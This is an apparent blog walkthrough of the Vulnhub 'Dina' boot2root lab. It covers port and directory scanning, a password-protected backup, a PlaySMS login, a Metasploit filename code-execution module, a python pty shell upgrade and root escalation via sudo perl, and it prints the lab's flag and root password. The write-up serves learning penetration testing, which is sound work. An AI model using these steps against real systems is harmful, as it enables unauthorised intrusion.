Dina 101 Vulnhub Walkthrough

Dina is another Easy boot2root machine from Vulnhub

Welcome to Dina 1.0.1

________                                                _________
\________\--------___       ___         ____----------/_________/
    \_______\----\\\\\\   //_ _ \\    //////-------/________/
        \______\----\\|| (( ~|~ )))  ||//------/________/
            \_____\---\\ ((\ = / ))) //----/_____/
                 \____\--\_)))  \ _)))---/____/
                       \__/  (((     (((_/
                          |  -)))  -  ))

This is my first Boot2Root - CTF VM. I hope you enjoy it.

if you run into any issue you can find me on Twitter: @touhidshaikh22

Contact: touhidshaikh22 at gmaill.com <- Feel Free to write mail

Website: http://www.touhidshaikh.com

Goal: /root/flag.txt

Level: Beginner (IF YOU STUCK ANYwhere PM me for HINT, But I don't think need any help).

Download: https://drive.google.com/file/d/0B1qWCgvhnTXgNUF6Rlp0c3Rlb0k/view

Try harder!: If you are confused or frustrated don't forget that enumeration is the key!

Feedback: This is my first boot2root - CTF Virtual Machine, please give me feedback on how to improve!

Tested: This VM was tested with:

Virtual Box 5.X
Networking: DHCP service: Enabled

**IP address**: Automatically assign

Starting with netdiscover to find the IP address

netdiscover -r
Currently scanning: Finished! | Screen View: Unique Hosts
44 Captured ARP Req/Rep packets, from 6 hosts. Total size: 2640
IP At MAC Address Count Len MAC Vendor / Hostname
...... 08:00:27:df:1e:ce 1 60 PCS Systemtechnik GmbH

This time lets use ZenMap instead of NMap for the port scanning with the profile “Intense scan all TCP ports” that is equivalent to

nmap -p 1-65535 -T4 -A -v

So only port 80 is open. Apache is running 2.2.22 that is outdated but no public exploits were found from searchsploit to target the web server it self.

Lets run nikto and dirb to search for directories or any other interesting stuff that might me useful.

---- Scanning URL: ----
+ (CODE:403|SIZE:288)                                       
+ (CODE:200|SIZE:3618)                                         
+ (CODE:200|SIZE:3618)                                    
+ (CODE:200|SIZE:102)                                         
+ (CODE:200|SIZE:102)                                     
==> DIRECTORY:                                               
+ (CODE:403|SIZE:293)                                  
==> DIRECTORY:                                                  
==> DIRECTORY:                                              
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2019-02-18 09:53:44 (GMT-5)
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 09:46:52 2017
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /ange1/: Directory indexing found.
+ Entry '/ange1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /angel1/: Directory indexing found.
+ Entry '/angel1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /uploads/: Directory indexing found.
+ Entry '/uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.

Interesting results.
Lets open the website and start digging around.

Nothing interesting here or on the source code.

Starting with dirb results:

robots.txt has some interesting results.

User-agent: *
Disallow: /ange1 ---> empty 
Disallow: /angel1 ---> empty 
Disallow: /nothing ---> fake 404 page
Disallow: /tmp ---> empty 
Disallow: /uploads ---> empty 

/nothing dir is a fake error 404 page

Viewing the source code reveals some passwords.

<head><title>404 NOT FOUND</title></head>
#my secret pass
<h1>NOT FOUND</html>
<h3>go back</h3>

No use for now but we will definitely use them later on.

dirb also found another directory that was not listed on robots.txt ( that contains a backup.zip file

The zip file contains an mp3 file but it is locked with a password.
The first password that we previously found in the source code of the fake error 404 (freedom) unzips it successfully.

When we try to open and listen the mp3 file we get an error because the file seems to be corrupted.
Checking the file type with file command reveals that it is not an mp3 file but just a simple text file.

file backup-cred.mp3

So we found a username “touhid” and an interesting directory “/SecreTSMSgatwayLogin”

Opening that directory returns a web application called PlaySMS

We don’t have any credentials but we have the username “touhid” and a few more passwords to try for the fake error 404 page.

Username: touid 
Password: diana 

And we are in!

Now lets search if there are any vulnerabilities for the specific web app with searchsploit

searchsploit PlaySMS

And we got really interesting results to try. We dont know the exact version of PlaySMS that runs on this machine but we have many exploits available for many different versions to try. Some of the exploits are even supported by metasploit.

---------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                              |  Path
                                                                            | (/usr/share/exploitdb/)
---------------------------------------------------------------------------- ----------------------------------------
PlaySMS - 'import.php' (Authenticated) CSV File Upload Code Execution (Meta | exploits/php/remote/44598.rb
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File | exploits/php/webapps/42003.txt
PlaySMS 1.4 - 'import.php' Remote Code Execution                            | exploits/php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenticated) 'Code Execution ( | exploits/php/remote/44599.rb
PlaySMS 1.4 - Remote Code Execution                                         | exploits/php/webapps/42038.txt
PlaySms 0.7 - SQL Injection                                                 | exploits/linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting                              | exploits/php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions                       | exploits/php/webapps/7687.txt
PlaySms - Remote File Inclusion                                     | exploits/php/webapps/17792.txt
PlaySms - Cross-Site Request Forgery                                | exploits/php/webapps/30177.txt
---------------------------------------------------------------------------- ----------------------------------------

Searching deeper to the exploits and reading the descriptions it was an easy pick. Just read the description of “PlaySMS 1.4 – ‘sendfromfile.php?Filename’ (Authenticated) ‘Code Execution”.

This module exploits a code injection vulnerability within an authenticated file upload feature in PlaySMS v1.4. This issue is caused by improper file name handling in sendfromfile.php file. Authenticated Users can upload a file and rename the file with a malicious payload. This module was tested against PlaySMS 1.4 on VulnHub’s Dina 1.0 machine and Windows 7.

So we started metasploit and selected the proper exploit.

msf5 > search playsms
Matching Modules

   Name                                       Disclosure Date  Rank       Check  Description
   ----                                       ---------------  ----       -----  -----------
   exploit/multi/http/playsms_filename_exec   2017-05-21       excellent  Yes    PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
   exploit/multi/http/playsms_uploadcsv_exec  2017-05-21       excellent  Yes    PlaySMS import.php Authenticated CSV File Upload Code Execution
msf5 > use exploit/multi/http/playsms_filename_exec
msf5 exploit(multi/http/playsms_filename_exec) > show options
Module options (exploit/multi/http/playsms_filename_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base playsms directory path
   USERNAME   admin            yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host

Now we just have to set the proper parameters.
USERNAME: touhid
TARGETURI: /SecreTSMSgatwayLogin

Lets do a check and run the exploit!

And it was successful. We got a meterpreter shell.

Lets get a shell with the meterpreter command “shell” and the upgrade it to TTY shell with python running

python -c 'import pty; pty.spawn("/bin/sh")'

We are still user wwwdata. We need to get root access by elevating our privileges by a privilege escalation script.

From sysinfo meterpreter command we got that the kernel and OS are:
Linux Dina 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686

3.2.0-23-generic-pae is an old kernel that suffers from “Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) – ‘perf_swevent_init’ Local Privilege Escalation (3)” (https://www.exploit-db.com/exploits/33589) or we could just use the really famous Dirtycow exploit. (https://dirtycow.ninja/)

We could download and compile this exploit, then download it to /tmp directory that we could write and execute files as wwwdata and get root access. But there is an easier way. Lets keep it simple.

Running the command “sudo -l” we can view all the commands we can run as current user with root privileges.

We have a Perl Shell as root. That is way more easy!

So we could just use the perl shell to view the flag.txt that we know is located at /root/flag.txt from the description of the machine.

sudo -u root perl -e 'exec "/bin/sh";'

cat /root/flag.txt
________                                                _________
\________\--------___       ___         ____----------/_________/
    \_______\----\\\\\\   //_ _ \\    //////-------/________/
        \______\----\\|| (( ~|~ )))  ||//------/________/
            \_____\---\\ ((\ = / ))) //----/_____/
                 \____\--\_)))  \ _)))---/____/
                       \__/  (((     (((_/
                          |  -)))  -  ))

root password is : hello@3210
easy one .....but hard to guess.....
but i think u dont need root password......
u already have root shelll....

FLAG : 22d06624cd604a0626eb5a2992a6f2e6

That was a really fun and straight forward machine. Great lesson that I learned from it is to keep it simple and don’t always try the obvious but complicated ways. There might be a shortcut!

Leave a Reply

Your email address will not be published. Required fields are marked *